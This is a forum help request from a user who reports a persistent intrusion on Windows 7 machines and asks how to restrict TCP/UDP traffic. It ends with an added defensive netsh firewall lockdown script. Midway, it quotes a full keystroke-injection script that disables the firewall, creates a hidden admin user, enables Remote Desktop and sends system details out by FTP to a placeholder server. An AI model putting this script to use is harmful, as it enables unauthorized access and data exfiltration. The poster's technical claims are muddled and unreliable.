I owned an internet service provider service for a number of years, and in 1996 some guys from Russia and China came calling, with a brief appearance from a group in Sweden of all places. It was a 6 month battle. Short for a war, but after much grief on both sides I was able to remove the swine and cast them over the cliffs to their death. Yes, it was a Windows NT Server farm and I had just started moving to Unix.
Now with just a couple of XP and Win7 boxes I play around with things to attempt to keep my brain from stagnating, although my daughter says it is way too late to prevent that.
The issue is something got through many layers of firewalls, virus and malware programs. I thought I had cast it asunder at least 10 times now. However, 10 minutes ago I see in my Monitor folder/drive changes. "Windows Trusted Installer has determined ...." and then a few seconds later a new NTDmini.DAT file is generated.
Now, after trying to log port sniffers and TCP-UDP end points and so on, it is very hard to see anything when there are over 200 people hitting your computer within a second or two. The only thing I have found that helps is to block 65,000+ ports and only leave 6 to 12 ports open.
The attackers' latest attempt was from hidden IP addresses, 233.216.xxx.xxx, and a non-existent domain www.niser.org
ntdll.dll!RtlRegisterThreadWithCsrss+0x197 01A90000 01A8E000 00002000 7FFDD000 0025E414 0025E4BC -> 2015-03-24 11:12:57:072 2268 ef8 Misc = Module: C:\Windows\system32\ DETAIL - 7 user registry handles leaked from \Registry\User\S-1-5-21-3132887318-2642499473-540075541-1000: Process 1340 (\Device\HarddiskVolume2\Windows\System32\svchost.exe) has opened key \REGISTRY\USER\S-1-5-21-3132887318-2642499473-540075541-1000\Software HKLM\SYSTEM\ControlSet001\Control\Session Manager PendingFileRenameOperations REG_MULTI_SZ \??\C:\Users\xxxxxx\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7}\fpb.tmp;;\??\C:\Users\xxxxxxx1\AppData\Local\Temp\{74E401B6-9F16-4CCF-8559-B1A38CC7B5B7};;; 3/26/2015 6:32:16 PM 171
Anyway, I am wondering how to stop all traffic other than traffic from a specific web page domain, or require an ALLOW access to this content. I will kill this but want something to fight back with. There has to be a way to actually close a port and lock the darn door.
Example here that this is happening.
Target: Windows 7 Description: Script for turning off the firewall, adding a user, making it an administrator, enabling remote access and sending (by FTP) the IP number to a server of your choice, then deleting the file. DELAY 2000 ESCAPE CONTROL ESCAPE DELAY 400 STRING cmd DELAY 400 CTRL-SHIFT ENTER DELAY 400 STRING netsh firewall set opmode mode=disable ENTER DELAY 400 STRING ALT y ENTER DELAY 400 STRING net user /add username password ENTER DELAY 400 STRING net localgroup administrators username /add ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f ENTER DELAY 400 STRING reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f ENTER DELAY 400 STRING sc config TermService start= auto ENTER DELAY 400 STRING net start Termservice ENTER DELAY 400 STRING cd %USERPROFILE% ENTER DELAY 400 STRING ipconfig /all > number.txt ENTER DELAY 400 STRING ftp -i ftp server ENTER DELAY 400 STRING login name ENTER DELAY 400 STRING login password ENTER DELAY 600 STRING prompt ENTER DELAY 400 STRING prompt ENTER DELAY 400 STRING PUT number.txt ENTER DELAY 2000 STRING bye ENTER DELAY 400 STRING del number.txt ENTER DELAY 400 ALT SPACE STRING c
So sorry, I know this is not anyone's problem. Unless it happens to you. The code posted is from a Gov admin that caught it after it was posted to a forum. There was some kind of stopping or disabling of the BFE service at the top of the script (I did not receive that part). He did test it and was blown away because it worked and he gained access to another department's computers. *so I was told*
If there is something that can point me in the direction to restrict TCP/UDP I would be grateful.
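One way to do what the post asks for on a Windows 7 box, using only the built-in firewall and its netsh advfirewall interface. This is an added example, not from the original post or the script it quotes; the DNS, web and update addresses are placeholders to replace with your own, and it assumes an elevated command prompt.

```bat
@echo off
REM Added example, not from the original post. Locks down the built-in
REM Windows 7 firewall with netsh advfirewall: inbound blocked entirely,
REM outbound denied by default, with explicit allow rules only for the
REM hosts this box needs. Run from an elevated (Run as administrator)
REM cmd prompt. The three addresses below are placeholders.
set DNS_SERVER=192.0.2.53
set WEB_HOST=192.0.2.80
set UPDATE_HOST=192.0.2.90

REM 1. Force the firewall service and all profiles back on, so a script
REM    that ran "netsh firewall set opmode mode=disable" has no effect.
sc config MpsSvc start= auto >nul
net start MpsSvc >nul 2>&1
netsh advfirewall set allprofiles state on

REM 2. Default policy for every profile: block both directions. The stock
REM    setting only blocks inbound; outbound is allowed by default.
netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound

REM 3. Log dropped packets so you can see what is knocking, instead of
REM    running a sniffer while the box is being hammered.
netsh advfirewall set allprofiles logging droppedconnections enable
netsh advfirewall set allprofiles logging filename "%SystemRoot%\system32\LogFiles\Firewall\pfirewall.log"
netsh advfirewall set allprofiles logging maxfilesize 8192

REM 4. Remove any earlier copies of our rules so the script can be re-run.
for %%R in ("LOCKDOWN DNS" "LOCKDOWN Web" "LOCKDOWN Update") do (
    netsh advfirewall firewall delete rule name=%%R >nul 2>&1
)

REM 5. Allow only the outbound traffic that is actually needed.
netsh advfirewall firewall add rule name="LOCKDOWN DNS" dir=out action=allow protocol=UDP remoteip=%DNS_SERVER% remoteport=53
netsh advfirewall firewall add rule name="LOCKDOWN Web" dir=out action=allow protocol=TCP remoteip=%WEB_HOST% remoteport=80,443
netsh advfirewall firewall add rule name="LOCKDOWN Update" dir=out action=allow protocol=TCP remoteip=%UPDATE_HOST% remoteport=80,443

REM 6. Verify: every profile should report State ON and the policy
REM    BlockInbound,BlockOutbound, and the three LOCKDOWN rules exist.
netsh advfirewall show allprofiles | findstr /i "State Policy"
netsh advfirewall firewall show rule name=all | findstr /i "LOCKDOWN"
```

Any enabled allow rule, including Microsoft's built-in ones, still wins over the default block, so go through `netsh advfirewall firewall show rule name=all` and disable the ones you do not want. Expect anything not listed here, Windows Update included unless its hosts are allowed, to stop working until you add a rule for it.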